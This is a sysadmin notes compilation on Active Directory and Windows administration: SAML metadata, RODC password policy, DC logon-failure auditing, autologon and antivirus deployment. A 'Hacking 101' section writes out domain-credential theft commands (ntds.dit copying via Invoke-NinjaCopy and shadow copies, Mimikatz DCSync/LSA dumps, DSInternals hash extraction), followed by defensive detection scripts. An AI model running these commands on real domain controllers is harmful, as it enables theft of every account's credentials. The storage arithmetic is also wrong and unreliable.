'Location' => 'https://app01.ui.prod.kimconnect.com:8443/simplesaml/module.php/saml/sp/saml1-acs.php/default-sp',
),
2 =>
array (
'index' => 2,
'Binding' => 'urn:oasis:names:tc:SAML:2.0:bindings:HTTP-Artifact',
'Location' => 'https://app01.ui.prod.kimconnect.com:8443/simplesaml/module.php/saml/sp/saml2-acs.php/default-sp',
),
3 =>
array (
'index' => 3,
'Binding' => 'urn:oasis:names:tc:SAML:1.0:profiles:artifact-01',
'Location' => 'https://app01.ui.prod.kimconnect.com:8443/simplesaml/module.php/saml/sp/saml1-acs.php/default-sp/artifact',
),
),
'contacts' =>
array (
0 =>
array (
'emailAddress' => 'admin@kimconnect.com',
'contactType' => 'technical',
'givenName' => 'Ops',
),
),
);

$metadata['https://app02.ui.prod.kimconnect.com:8443/simplesaml/module.php/saml/sp/metadata.php/default-sp'] = array (
'SingleLogoutService' =>
array (
0 =>
array (
'Binding' => 'urn:oasis:names:tc:SAML:2.0:bindings:HTTP-Redirect',
'Location' => 'https://app02.ui.prod.kimconnect.com:8443/simplesaml/module.php/saml/sp/saml2-logout.php/default-sp',
),
),
'AssertionConsumerService' =>
array (
0 =>
array (
'index' => 0,
'Binding' => 'urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST',
'Location' => 'https://app02.ui.prod.kimconnect.com:8443/simplesaml/module.php/saml/sp/saml2-acs.php/default-sp',
),
1 =>
array (
'index' => 1,
'Binding' => 'urn:oasis:names:tc:SAML:1.0:profiles:browser-post',
'Location' => 'https://app02.ui.prod.kimconnect.com:8443/simplesaml/module.php/saml/sp/saml1-acs.php/default-sp',
),
2 =>
array (
'index' => 2,
'Binding' => 'urn:oasis:names:tc:SAML:2.0:bindings:HTTP-Artifact',
'Location' => 'https://app02.ui.prod.kimconnect.com:8443/simplesaml/module.php/saml/sp/saml2-acs.php/default-sp',
),
3 =>
array (
'index' => 3,
'Binding' => 'urn:oasis:names:tc:SAML:1.0:profiles:artifact-01',
'Location' => 'https://app02.ui.prod.kimconnect.com:8443/simplesaml/module.php/saml/sp/saml1-acs.php/default-sp/artifact',
),
),
'contacts' =>
array (
0 =>
array (
'emailAddress' => 'admin@kimconnect.com',
'contactType' => 'technical',
'givenName' => 'Ops',
),
),
);

Overview: ReadOnly Domain Controllers (RODC)

Starting with Windows 2008, Microsoft has provided a feature called Password Replication Policy (PRP). It is an element of control over "credential caching." In scenarios where protected groups, computer objects, and users' credentials need to be guarded against potential breaches of remote zones, their passwords must be made non-cacheable on those RODCs.

Furthermore, Windows 2012 adds two default security groups that are generated automatically during the RODC setup process.

  1. Allowed RODC Password Replication Group: Members of this group are placed in the Allow list of the Password Replication Policies of all RODCs by default. This group has no members when Windows Server 2012 is first installed.
  2. Denied RODC Password Replication Group: Members of this group are placed in the Deny list of the Password Replication Policies of all RODCs by default. Some of the groups include Administrators, Server Operators, Backup Operators, Account Operators, and Denied RODC Password Replication Group.

Of course, a local Administrators group is also available on an RODC; this group does not exist on writable DCs. Members of the local Administrators group have full control over that zoned environment. Hence, the RODC's local SAM architecture resembles a "member server" rather than a typical domain controller. It's important to note that local admin accounts on member servers and RODCs do not propagate to the parent DCs.
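The Deny list only says what should not be cached; what matters after a branch compromise is what actually is cached. The following is an added example, not part of the original notes: Compare-RevealedWithProtected is the pure check (which accounts cached on an RODC belong to groups that must never be cached there), and Invoke-RodcPrpAudit feeds it live data from the ActiveDirectory module. RODC01, the group list and the constructed sample accounts are assumptions.

```powershell
# Added example, not part of the original notes. The comparison is kept separate
# from the AD cmdlets so it can be exercised with constructed data; the audit
# wrapper needs RSAT and a domain-joined host. RODC01 and the sample SIDs are made up.
function Compare-RevealedWithProtected {
    param(
        [Parameter(Mandatory)][object[]]$Revealed,      # objects with SamAccountName and SID
        [Parameter(Mandatory)][string[]]$ProtectedSids, # SID strings of members of protected groups
        [string]$Rodc = 'unknown'
    )
    foreach ($acct in $Revealed) {
        if ($ProtectedSids -contains [string]$acct.SID) {
            [pscustomobject]@{
                RODC    = $Rodc
                Account = $acct.SamAccountName
                Finding = 'secret of a protected account is cached on the RODC'
            }
        }
    }
}

function Invoke-RodcPrpAudit {
    param(
        [Parameter(Mandatory)][string]$Rodc,
        [string[]]$ProtectedGroups = @('Domain Admins', 'Administrators', 'Server Operators',
                                       'Backup Operators', 'Account Operators',
                                       'Denied RODC Password Replication Group')
    )
    Import-Module ActiveDirectory
    # Accounts whose secrets are currently stored on this RODC (not merely "allowed")
    $revealed = Get-ADDomainControllerPasswordReplicationPolicyUsage -Identity $Rodc -RevealedAccounts
    # Recursive membership of the groups the Deny list is meant to protect
    $sids = foreach ($g in $ProtectedGroups) {
        Get-ADGroupMember -Identity $g -Recursive | ForEach-Object { [string]$_.SID }
    }
    Compare-RevealedWithProtected -Revealed $revealed -ProtectedSids $sids -Rodc $Rodc
    # For reference, also list what the policy itself allows to be cached
    Get-ADDomainControllerPasswordReplicationPolicy -Identity $Rodc -Allowed |
        Select-Object @{ n = 'AllowedEntry'; e = { $_.Name } }
}

# Constructed sample: two cached accounts, one of which is a Domain Admin
$sampleRevealed = @(
    [pscustomobject]@{ SamAccountName = 'branch.user'; SID = 'S-1-5-21-1-2-3-1105' },
    [pscustomobject]@{ SamAccountName = 'da.smith';    SID = 'S-1-5-21-1-2-3-500' }
)
Compare-RevealedWithProtected -Revealed $sampleRevealed -ProtectedSids @('S-1-5-21-1-2-3-500') -Rodc 'RODC01'
```

A privileged account turning up in the revealed list usually means someone logged on to a branch host with it while it was not in the Deny list at the time; the fix is to reset that account's password and correct the policy, since the RODC already holds the old secret.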

Audit Logon Successes & Failures on All Domain Controllers

Issue:

In a realistic situation, InfoSec would notify DBAdmins and SysAdmins of failed logon alerts from certain service accounts. When using Windows to check the events, this would be a typical log item.

Resolution:

Since the event log on the Database Server only shows failed logins on itself, it is necessary to check domain controller logs using the commands shown below.

# Coding aspects...

# Run locally on each DC
Get-EventLog -LogName Security | Where-Object { $_.EntryType -eq 'FailureAudit' }

# Initiate from a jump box against a single DC
Get-EventLog -LogName Security -ComputerName DCNAME | Where-Object { $_.EntryType -eq 'FailureAudit' }

# Initiate from a jump box with access to all DCs
Import-Module ActiveDirectory
# IsReadOnly is a boolean, so compare against $false rather than the string "False":
# a non-empty string converts to $true, which made the original filter work only by accident
$writableDCs = Get-ADDomainController -Filter * | Where-Object { $_.IsReadOnly -eq $false } | Select-Object Name
$writableDCs.Name | ForEach-Object -Process { Get-EventLog -LogName Security -ComputerName $_ | Where-Object { $_.EntryType -eq 'FailureAudit' } | Export-Csv "C:\Reports\$_`-LogonFailures.csv" -NoTypeInformation }

The audit logs would only be available if the Group Policy (GP) Audit Logon has been set to capture Success and Failure events. Here are the steps to enable this using GP.

Locate the Default Domain Controllers Policy > Edit > navigate to Computer Configuration – Windows Settings – Advanced Audit Policy Configuration – Logon/Logoff > double-click on Audit Logon > set value = Success and Failures

Other Considerations:

1. How many events will be generated if this is turned on?

This extra logging will persist on all DCs as long as the policy is applied. The impact can be estimated using this formula:

Extra events per day = (number of users x probability of a logon failure per user per day) + (number of service accounts x probability per account per day) + (number of computer accounts x probability per computer per day)

This would be a guess for a company of 1000 employees: ((1000 x .1) + (300 x .0001) + (1500 x 0.00001)) = 100.045 extra events will be generated per day.

2. How much disk space will this take for the extra logging?

Disk storage = Extra events per day x average size of each failure log

How about this guess: ((1000 x .01) + (300 x .0001) + (1500 x 0.00001)) x 200 bytes = 20,009 bytes per day ~ 600,270 bytes per 30-day extra logging (586.20 MBs of storage per month)

Get-WinEvent:
– Returns System.Diagnostics.Eventing.Reader.EventLogRecord.
– Uses the event log engine on the remote machine to filter the logs before sending results over the wire. This potentially reduces the amount of data transmitted for smaller result sets.
– Can be parsed into XML and accessed on the fly (ToXml() returns a string, so cast it to [xml] before navigating it):
[xml]$eventxml = $event.ToXml()
$eventxml.Event.EventData.Data
– Note: the -FilterHashTable parameter only works with Windows 7 & Windows 2008 R2. It will not work with Windows 2008. On these incompatible systems, use -FilterXML instead.
– Syntax:

Get-EventLog: returns System.Diagnostics.EventLogEntry
– Runs approximately 2x faster than Get-WinEvent to retrieve Security logs for audit failures
– Example: Get-EventLog -LogName Security -ComputerName $Server | Where-Object { "FailureAudit" -eq $_.EntryType }

# Script to collect all failed logon attempts as recorded on all DCs

Import-Module ActiveDirectory
#$allDCs=Get-ADDomainController -Filter * | Where-Object { $_.IsReadOnly -eq $false } | Select-Object Name
$allDCs = Get-ADDomainController -Filter * | Select-Object Name
$allDCs.Name | ForEach-Object -Process { Get-EventLog -LogName Security -ComputerName $_ | Where-Object { $_.EntryType -eq 'FailureAudit' } | Export-Csv "C:\Reports\$_`-LogonFailures.csv" -NoTypeInformation }
<#
This would happen if one tries to open the file while it's being generated:
export-csv : The process cannot access the file because another process has locked a portion of the file.
At line:1 char:135
+ ... -eq 'FailureAudit' } | export-csv "C:\Reports\$_`-LogonFailures.csv"}
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [Export-Csv], IOException
+ FullyQualifiedErrorId : System.IO.IOException,Microsoft.PowerShell.Commands.ExportCsvCommand
#>
# Script to audit successful logons of a particular account in the past 7 days

Import-Module ActiveDirectory
$allDCs = Get-ADDomainController -Filter * | Select-Object Name
# EventLogEntry has no TargetUserName property; the account name is one of the event's
# ReplacementStrings (or can be searched in $_.Message), so filter on that instead
$allDCs | ForEach-Object -Process { Get-EventLog -LogName Security -ComputerName $_.Name -After (Get-Date).AddDays(-7) | Where-Object { $_.EntryType -eq 'SuccessAudit' } | Where-Object { $_.ReplacementStrings -contains 'svc_oitwflow' } }
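The scripts above pull whole Security logs across the wire and then filter client-side. As an added example, not part of the original notes, here is the same audit done the Get-WinEvent way: the filter runs on each DC, only event 4625 records in the time window are returned, and the XML the notes mention is parsed into a flat object so failures can be grouped by account and source address. ConvertFrom-FailedLogonEvent works on the XML alone, so the constructed sample at the bottom runs offline; Get-FailedLogonSummary needs the ActiveDirectory module and reachable DCs. Account, host and address values in the sample are made up.

```powershell
# Added example, not part of the original notes. Parses Security event 4625
# (failed logon) from the XML that EventLogRecord.ToXml() returns and summarises
# failures per account and source across all DCs. Sample values are made up.
function ConvertFrom-FailedLogonEvent {
    param([Parameter(Mandatory)][xml]$EventXml)
    $data = @{}
    foreach ($d in $EventXml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
    [pscustomobject]@{
        Time        = [datetime]$EventXml.Event.System.TimeCreated.SystemTime
        Account     = $data['TargetUserName']
        Domain      = $data['TargetDomainName']
        Source      = $data['IpAddress']
        Workstation = $data['WorkstationName']
        LogonType   = $data['LogonType']
        # SubStatus separates bad password (0xC000006A) from unknown user (0xC0000064) etc.
        SubStatus   = $data['SubStatus']
    }
}

function Get-FailedLogonSummary {
    param([int]$Days = 7, [string]$Account)
    Import-Module ActiveDirectory
    $filter = @{ LogName = 'Security'; Id = 4625; StartTime = (Get-Date).AddDays(-$Days) }
    $events = foreach ($dc in (Get-ADDomainController -Filter *).HostName) {
        # filtering happens on the DC; only matching records cross the wire
        Get-WinEvent -ComputerName $dc -FilterHashtable $filter -ErrorAction SilentlyContinue |
            ForEach-Object { ConvertFrom-FailedLogonEvent -EventXml $_.ToXml() }
    }
    if ($Account) { $events = $events | Where-Object { $_.Account -eq $Account } }
    $events | Group-Object Account, Source | Sort-Object Count -Descending |
        Select-Object Count,
            @{ n = 'Account'; e = { $_.Group[0].Account } },
            @{ n = 'Source';  e = { $_.Group[0].Source } },
            @{ n = 'Last';    e = { $_.Group.Time | Sort-Object -Descending | Select-Object -First 1 } }
}

# Constructed 4625 event, trimmed to the fields the parser reads
$sampleEvent = @'
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <EventID>4625</EventID>
    <TimeCreated SystemTime="2020-01-15T08:03:11.000Z"/>
  </System>
  <EventData>
    <Data Name="TargetUserName">svc_oitwflow</Data>
    <Data Name="TargetDomainName">CORP</Data>
    <Data Name="SubStatus">0xC000006A</Data>
    <Data Name="LogonType">3</Data>
    <Data Name="WorkstationName">DBSRV01</Data>
    <Data Name="IpAddress">10.20.30.40</Data>
  </EventData>
</Event>
'@
ConvertFrom-FailedLogonEvent -EventXml $sampleEvent
```

Usage: `Get-FailedLogonSummary -Days 7 -Account svc_oitwflow` answers the question InfoSec asked (which host keeps failing with that service account) in one table, which is what the per-DC CSV files above required joining by hand. On a DC that still runs Windows 2008, swap the hashtable for -FilterXml as the notes say.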

Hacking 101: Domain Controllers as One of the Many Usual Targets

A potential bad actor’s full network penetration repertoire is beyond the scope of this article. Here, we’re looking at the scenario where elevated domain access has been gained by the hacker. What would be an obvious next step for this player to consider? The answer is stored somewhere inside the Ntds.dit database.

All passwords of users and computers, system objects, and group memberships are stored inside the Ntds.dit file. Hence, this is the key to the kingdom. Personnel without security discipline may try to simply copy this file using the Windows GUI. That's the wrong way, because this is a database file that is held in a constant read-write lock by the system's "Kerberos Key Distribution Center" service. These are some of the methods used to retrieve a copy of this file.

Method 1: Use an Advanced Windows Penetration tool such as PowerSploit (https://github.com/PowerShellMafia/PowerSploit)

Once this module is imported, it has a function called Invoke-NinjaCopy. Yup, it does what its name implies. The magic is in the module's ability to evade the system services that would record its activity; hence, there would be no triggering of monitoring systems. The way Invoke-NinjaCopy accomplishes this is by accessing the raw NTFS volume I/O, abstracted by PowerShell's Invoke-MemoryLoadLibrary.

Command: Invoke-NinjaCopy -path C:\Windows\NTDS\ntds.dit -localdestination C:\Extract\SYS\ntds.dit

Method 2: Use the Novice plain vanilla PowerShell commands

vssadmin create shadow /for=c:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy$version\Windows\ntds\ntds.dit
reg SAVE HKLM\SYSTEM C:\Extract\SYS
\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy$version\Windows\System32\config\SYSTEM C:\Extract\SYSTEM
vssadmin delete shadows /shadow=$shadowID

Now that a point-in-time NTDS.DIT has been copied, the next step is to extract password hashes and record system object IDs (beyond the scope of this writing). This process can run on any computer: Windows, Linux, or MacOS.

The advanced method is to continue using tools such as PowerSploit. There’s a function called Invoke-Mimikatz that “leverages Mimikatz 2.0 and Invoke-ReflectivePEInjection to reflectively load Mimikatz completely in memory. This allows you to do things such as dump credentials without ever writing the Mimikatz binary to disk.”

Commands:
Invoke-Mimikatz -DumpCreds $LSASSHash

LSADUMP::LSA – Ask LSA Server to retrieve SAM/AD enterprise (normal, patch on the fly or inject). Use to dump all Active Directory domain credentials from a Domain Controller or lsass.dmp dump file. Also used to get specific account credential such as krbtgt with the parameter /name: “/name:krbtgt”

LSADUMP::DCSync – ask a DC to synchronize an object (get password data for account).

LSADUMP::SAM – get the SysKey to decrypt SAM entries (from registry or hive). The SAM option connects to the local Security Account Manager (SAM) database and dumps credentials for local accounts. This is used to dump all local credentials on a Windows computer.

LSADUMP::Trust – Ask LSA Server to retrieve Trust Auth Information (normal or patch on the fly). Dumps trust keys (passwords) for all associated trusts (domain/forest).

Once more, it's worth mentioning that a novice approach is to use Windows. There is a PowerShell module called DSInternals that has a function named Get-ADDBAccount to perform password extraction. Note that there is a $key variable that I can't show you here, as somebody may violate a company's security policies under the "no system penetration testing without authorization" clause.

Command:
Import-Module DSInternals
Get-ADDBAccount -All -DBPath 'C:\Extract\ntds.dit' -BootKey $key

Note that this method only retrieves “password hashes,” not the plain-text values. Here are more DSInternals commands to illustrate follow-through:

# Decrypt a password from Group Policy Preferences
ConvertFrom-GPPrefPassword $groupPolicyPrefPassword

# Decrypt a password from Password Blob
ConvertFrom-ADManagedPasswordBlob $ADManagedPasswordBlob

# Decrypt a password from an unattend.xml file
ConvertFrom-UnattendXmlPassword $unattendXmlPassword
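Every method in this section leaves a footprint on the domain controller: the shadow-copy route shows up as process creation (Security event 4688, when command-line auditing is enabled) and DCSync shows up as an object access (event 4662) in which a non-DC principal exercises the DS-Replication-Get-Changes rights. The following is an added example, not from the original article, written from the defender's side: Test-NtdsAccessEvent inspects one Security event as XML and returns a finding or $null, so the constructed samples run offline, while Get-NtdsAccessFindings feeds it live events from a DC. The two GUIDs are the well-known replication extended rights; user, host and command values are made up.

```powershell
# Added example, not part of the original article: detection logic for the
# NTDS.dit collection paths described above. GUIDs are the well-known replication
# extended rights; SubjectUserName, CommandLine and host values are constructed.
$ReplicationRights = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
}

function Test-NtdsAccessEvent {
    param(
        [Parameter(Mandatory)][xml]$EventXml,
        [string[]]$DcAccounts = @()   # machine accounts of real DCs, e.g. 'DC01$'
    )
    $data = @{}
    foreach ($d in $EventXml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
    $subject = $data['SubjectUserName']
    switch ([int]$EventXml.Event.System.EventID) {
        4662 {
            # Replication rights exercised by something that is not a DC: what
            # LSADUMP::DCSync looks like from the directory's point of view
            $used = $ReplicationRights.Keys | Where-Object { $data['Properties'] -match $_ }
            if ($used -and $subject -notin $DcAccounts) {
                return [pscustomobject]@{
                    Rule    = 'Replication right used by non-DC (DCSync-like)'
                    Subject = $subject
                    Detail  = ($used | ForEach-Object { $ReplicationRights[$_] }) -join ', '
                }
            }
        }
        4688 {
            # Process creation with command-line auditing on: shadow-copy or
            # direct-read tooling aimed at the AD database
            $cmd = $data['CommandLine']
            if ($cmd -match '(?i)vssadmin\s+create\s+shadow|ntdsutil|ntds\.dit|Invoke-NinjaCopy') {
                return [pscustomobject]@{
                    Rule    = 'NTDS.dit access tooling'
                    Subject = $subject
                    Detail  = $cmd
                }
            }
        }
    }
    return $null
}

function Get-NtdsAccessFindings {
    param([Parameter(Mandatory)][string]$DomainController, [int]$Hours = 24)
    Import-Module ActiveDirectory
    $dcAccounts = (Get-ADDomainController -Filter *).Name | ForEach-Object { "$_`$" }
    $filter = @{ LogName = 'Security'; Id = 4662, 4688; StartTime = (Get-Date).AddHours(-$Hours) }
    Get-WinEvent -ComputerName $DomainController -FilterHashtable $filter -ErrorAction SilentlyContinue |
        ForEach-Object { Test-NtdsAccessEvent -EventXml $_.ToXml() -DcAccounts $dcAccounts } |
        Where-Object { $_ }
}

# Constructed samples, trimmed to the fields the rules read
$dcsyncEvent = @'
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>4662</EventID></System>
  <EventData>
    <Data Name="SubjectUserName">jdoe</Data>
    <Data Name="Properties">{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}</Data>
  </EventData>
</Event>
'@
$shadowEvent = @'
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>4688</EventID></System>
  <EventData>
    <Data Name="SubjectUserName">jdoe</Data>
    <Data Name="CommandLine">vssadmin create shadow /for=c:</Data>
  </EventData>
</Event>
'@
Test-NtdsAccessEvent -EventXml $dcsyncEvent -DcAccounts @('DC01$')
Test-NtdsAccessEvent -EventXml $shadowEvent
```

Two prerequisites decide whether these rules see anything: 4662 is only written when "Audit Directory Service Access" is enabled and the domain object carries a SACL for the replication rights, and 4688 only carries the command line when "Include command line in process creation events" is turned on. Legitimate replication partners and backup software (Azure AD Connect accounts, for instance) belong in the exclusion list rather than being tuned out of the rule.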

How to turn on automatic logon in Windows XP that is joined to a domain

Start – Run – regedit – [enter]

Locate the following registry key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon

Double-click DefaultUserName, type in your user name, click OK

Double-click DefaultPassword, type in your password, click OK

If there is no DefaultPassword value, create the value with the associated password.

Note that if no DefaultPassword string is specified, Windows XP automatically changes the value of the AutoAdminLogon registry key from 1 (true) to 0 (false) to turn off the AutoAdminLogon feature.

If there is no AutoAdminLogon entry, create the entry and set its value to 1

To bypass the automatic logon and log on as a different user, hold down the SHIFT key while logging off or while Windows is starting. To enforce automatic logon even then (ignoring the SHIFT bypass after future logoffs), set the following registry value:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon

Value: ForceAutoLogon

Type: REG_SZ

Data: 1
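DefaultPassword is stored in clear text, so a machine set up this way hands its password to anyone who can read the key. As an added example, not part of the original notes and written to audit the setting rather than apply it, the function below reports whether a host is in that state. Test-AutoLogonConfig takes the Winlogon values as a hashtable so it runs without touching the registry; Get-AutoLogonFinding reads the live key on the local machine. The sample values are made up.

```powershell
# Added example, not part of the original notes: audit the Winlogon auto-logon
# values described above. Sample values are constructed.
function Test-AutoLogonConfig {
    param([Parameter(Mandatory)][hashtable]$Winlogon)
    $enabled = $Winlogon['AutoAdminLogon'] -eq '1'
    $hasPass = -not [string]::IsNullOrEmpty($Winlogon['DefaultPassword'])
    $forced  = $Winlogon['ForceAutoLogon'] -eq '1'
    if ($enabled -and $hasPass) {
        $risk = 'High: account password stored in clear text under HKLM; anyone who can read the key gets it'
    } elseif ($hasPass) {
        $risk = 'Medium: AutoAdminLogon is off but a DefaultPassword was left behind'
    } else {
        $risk = 'None'
    }
    [pscustomobject]@{
        User                 = $Winlogon['DefaultUserName']
        AutoLogonEnabled     = $enabled
        ClearTextPasswordSet = $hasPass
        ShiftBypassDisabled  = $forced
        Risk                 = $risk
    }
}

function Get-AutoLogonFinding {
    $key = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
    $props = Get-ItemProperty -Path $key
    $values = @{}
    foreach ($name in 'AutoAdminLogon', 'DefaultUserName', 'DefaultPassword', 'ForceAutoLogon') {
        $values[$name] = $props.$name
    }
    Test-AutoLogonConfig -Winlogon $values
}

# Constructed sample: the state the steps above leave behind
Test-AutoLogonConfig -Winlogon @{ AutoAdminLogon = '1'; DefaultUserName = 'kiosk'; DefaultPassword = 'P@ssw0rd' }
```

Where automatic logon is genuinely required (a kiosk, for example), the Sysinternals Autologon tool stores the password as an LSA secret instead of a clear-text DefaultPassword value, and the account should be a low-privilege local one, never a domain user with rights elsewhere.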

CA eTRust Threat Management

Install the Server Control to download updates and push them out to all installed agents on the network. All agent installations should include the XML licensing file that directs update behavior toward the Server Controlling machine.

Server:  eTrust Threat Management Console

Remote into MAIN01 server – Start – CA Console – Log On as Administrator

Proxy Server is under the Licensing tab.

Most machines would be added to Organization\4.X\PRIMARY and servers would be per customization

Agent Installation:

Exchange 2003 Server

  1. Install Agent as normal – Reboot
  2. Run \\MAIN01\itshare$\Software\Admin_Tools\CA_Antivirus\ITM_81\CD1-EFIGSBp\Common\Bin\eAV_Exch.OPT\setup.exe
  3. Run the eTrust Management Console by logging on to the SI-NT1 server
    1. Click the "Organization" tab – Ensure that the specified machine name is added to the organization name. If not, create a "branch" under Organization called Exchange Servers
    2. Click Policy Management – Add a new policy called Exchange Servers associated with the Exchange Servers organizational branch created in the previous step. Add the following executables to the exclusions list:
  • STORE.EXE
  • DSAMAIN.EXE
  • ISINTEG.EXE
  • ESEUTIL.EXE
  • MTACHECK.EXE
  • PERFWIZ.EXE
  • INETINFO.EXE
  • SRSMAIN.EXE
  • MAD.EXE
  4. Discovery tab – Organization Details – search for the Exchange server machine name to be added into the Exchange Servers organization branch.

SQL 2005

  1. Install Agent as normal – Reboot – Update antivirus definitions
  2. Run the eTrust Management Console by logging on to the SI-NT1 server
    1. Click the "Organization" tab – Ensure that the specified machine name is added to the organization name. If not, create a "branch" under Organization called SQL Servers
    2. Click Policy Management – Add a new policy called SQL Servers associated with the SQL Servers organizational branch created in the previous step. Add the following executables to the exclusions list:
  • SQLSERVER.exe
  • SQLADHLP90.exe
  • SQLAGENT90.exe
  • msmdsrv.exe
  • sqlbrowser.exe
  • msftesql.exe
  • msDtsSrvr.exe
  • Sqlwriter.exe
  3. Discovery tab – Organization Details – search for the SQL server machine name to be added into the SQL Servers organization branch.

All Other Machines – Normal Installation

  1. Run \\MAIN01\itshare$\Software\Admin_Tools\CA_Antivirus\ITM_81\CD1-EFIGSBp\setup.exe
  2. Click Next, Next, Next… to install the eTrust Threat Management Agent as a “Trial Version.”
  3. Run – cmd: copy /Y \\MAIN01\itshare$\Software\Admin_Tools\CA_Antivirus\license.xml "C:\Program Files\CA\SharedComponents\SubscriptionLicense\"
  4. Reboot

Note: "License.xml" is provided by CA when the license is purchased. This file is required so that a client machine can run updates prior to being connected to the network. The Pest Patrol Agent is not supported on 64-bit platforms.